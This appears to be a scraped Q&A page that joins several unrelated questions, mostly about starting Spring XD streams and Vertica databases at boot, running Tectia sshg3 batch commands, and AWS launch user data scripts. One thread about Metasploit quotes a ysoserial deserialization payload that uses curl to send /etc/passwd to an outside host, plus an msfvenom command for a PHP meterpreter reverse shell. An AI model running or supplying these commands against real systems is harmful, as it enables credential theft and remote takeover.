Create Stream on startup/by script - spring-xd

I'm looking to create a stream on startup of spring-xd container without having to manually enter it via xd-shell. I want to;
1. have xd-singlenode startup (invoked via bash)
2. have a pre-created stream definition (e.g. http --port=8080 | file) deployed after the container starts up
I know there's a url to invoke (curl -POST http://127.0.0.1:9393/streams?name=mystream&definition=http|file) but I'm having troubles with specifying additional configuration (like --port=8080) and the pipe (|) is causing some troubles too.
thanks

so the answer is that you can pass arguments (stream configurations) as a command line argument
xd-shell --cmdFile [filename]
The contents of the command file are what you would enter via the shell so where you would do this
xd:>stream create --name teststream --definition "http | file" --deploy
you would write a file like this
stream create --name teststream --definition "http | file" --deploy
so as an example;
xd-shell --cmdFile stream.cmd
all of which can be invoked from a shell

Also have a look at https://github.com/spring-projects/spring-xd/tree/master/src/test/scripts You should find similar examples using curl.
Also note that if you are running with an external ZooKeeper ensemble, which is the operational configuration, you don't need to do this. ZK persists and restores the XD cluster state upon restart so any streams that were deployed at shutdown will be deployed at start up. Single node starts an embedded ZK server by default, but may be configured to connect to an external server. For example,
export JAVA_OPTS=-Dzk.client.connect=localhost:2181
zk.client.connect accepts a comma-delimited string of host:port pairs

Related

SSH tectia, how to run batch commands?

I have tectia ssh server in a windows environment.
When I use sftpg3 -B cmd.txt username#host that works fine. The only problem is that it doesnt let me execute files remotely, it only lets me move files. It reads the commands from cmd.txt but since I cant execute anything it ignores the commands.
Well when I do the same thing but use sshg3, it doesnt recognize the -B flag at all.
SSHG3 -B cmd.txt username#host
cmd.txt' is not recognized as an internal or external command,
operable program or batch file.
I've tried putting -B "cmd.txt"
I tried just putting the cmd.txt contents in the same script instead of housing them in cmd.txt and getting rid of -B, but it doesnt run them that way either.
The docs dont have much to go off of. All it says is use -B for batch processing.
Contents of cmd.txt:
D:
cd Library
cd Backup
parseLibrary.cmd
exit
Trying to sshg3 into a host, navigate to a path and run a batch file on that host.
Any ideas?
-B, --batch-mode
Uses batch mode. Fails authentication if it requires user interaction on the terminal.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
It does use public key authentication, there is no user interaction needed on the terminal.
Noticed this on the docs for sftpg3
-B [ - | batch_file ]
The -B - option enables reading from the standard input. This option is useful when you want to launch processes with sftpg3 and redirect the stdin pipes.
By defining the name of a batch_file as an attribute, you can execute SFTP commands from the given file in batch mode. The file can contain any allowed SFTP commands. For a description of the commands, see the section called “Commands”.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
I'm guessing batch file is different than batch mode?
*I figured it out. You have to use the -B flag for every command you want to execute.
I figured it out. You have to use the -B flag for every command you want to execute.
sshg3 user#host -B dir -B ipconfig -B etc.cmd

How to 'path a file' when generate Metasploit shell?

I want to path a file with generate Metasploit shell. It is like this:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=#etc/passwd axample.com" | base64
like -F file in example, I want to path a file in command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
This is just command I want to path a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.
As I understand, you are using msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will bring you command shell of the target host).
This payload is a part of Metasploit framework - a predefined program, not your custom script and you want to pass your file to it. If so, it all depends on the Meterpreter's parameters to pass anything to it. But it seems that there is no such option as just path a some file in Meterpreter.
In example with curl the -F option is recognized by cURL application and stands for HTTP Forms posting and directs web server for file uploading with given by property name file.
But what path to file you want to pass to the Meterpreter payload? What is your final goal? Now it looks like no sense for it.
UPDATE for you comment
The curl is a different application and they use -F option format implemented. In msfvenom use to pass variable CUSTOM1 the following form:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...

How do I configure the aws instance ip during the user data configuration?

I have question about passing a shell script to an instance with user data. So what I need to configure here is, since my server is going to run on the instance, before the instance got created, the shell script should configure the server.xml information, (like the instance ip address, database ip addresss...) before starting the instance/server.
But, since the instance/server hasn't be generated yet, is there any variable I can use to pass the localhost information in the shell script? is there any way for user to specify some custom variable while running the user data before the instance got created? (before using the aws user data, I used to run it manually, through the configure.sh file and the config.properties file after the instance got created)
#!/bin/bash
# source the properties:
. ./config.properties
echo "Installation"
echo "Updating server.xml"
cd "Server/server/configuration/"
sed -i -s "s/SERVER_IP/"$LOCALHOST_IP"/g" server.xml
sed -i -s "s/DB_IP/"$DATABASE_IP"/g" server.xml
cd "../tomcat/bin"
sh startup.sh

AWS Launch Configuration not picking up user data

We are trying to build an an autoscaling group(lets say AS) configured with an elastic load balancer(lets say ELB) in AWS. The autoscaling group itself is configured with a launch configuration(lets say LC). As far as I could understand from the AWS documentation, pasting a script, as-is, in the user data section of the launch configuration would run that script for every instance launched into an auto scaling group associated with that auto scaling group.
For example pasting this in user data would have a file named configure available in the home folder of a t2 micro ubuntu image:
#!/bin/bash
cd
touch configure
Our end goal is:
Increase instances in auto scaling group, they launch with our startup script and this new instance gets added behind the load balancer tagged with the auto scaling group. But the script was not executed at the instance launch. My questions are:
1. Am i missing something here?
2. What should I do to run our startup script at time of launching any new instance in an auto scaling group?
3. Is there any way to verify if user data was really picked up by the launch?
The direction you are following is right. What is wrong is your user data script.
Problem 1:
What you have to remember is that user data will be executed as user root, not ubuntu. So if your script worked fine, you would find your file in /root/configure, NOT IN /home/ubuntu/configure.
Problem 2:
Your script is actually executing, but it's incorrect and is failing at cd command, thus file is not created.
cd builtin command without any directory given will try to do cd $HOME, however $HOME is NOT SET during cloud-init run, so you have to be explicit here.
Change your script to below and it will work:
#!/bin/bash
cd /root
touch configure
You can also debug issues with your user-data script by inspecting /var/log/cloud-init.log log file, in particular checking for errors in it: grep -i error /var/log/cloud-init.log
Hope it helps!

Start Vertica database during boot on Linux

I have Vertica installed in an Ubuntu virtual machine and I'd like to have a specific database started during the boot, instead of me having to login, open admintools and start from there.
So, is there a command line that would allow me to start it without user interaction?
In which run level should I add this?
Also, I use a specific user to run everything Vertica related, does this need to be taken into account in my boot script?
Why not just set the restart policy(reboot on boot) in your admintools "Set Restart Policy"
You have 3 option :
Never
ksafe
always -- chose this one to start on boot.
And that is it !
admintools -t start_db
[dbadmin#hostname ~]$ admintools -t start_db --help
Usage: start_db [options]
Options:
-h, --help show this help message and exit
-d DB, --database=DB Name of database to be started
-p DBPASSWORD, --password=DBPASSWORD
Database password in single quotes
-i, --noprompts do not stop and wait for user input(default false)
-F, --force force the database to start at an epoch before data
consistency problems were detected.

Resources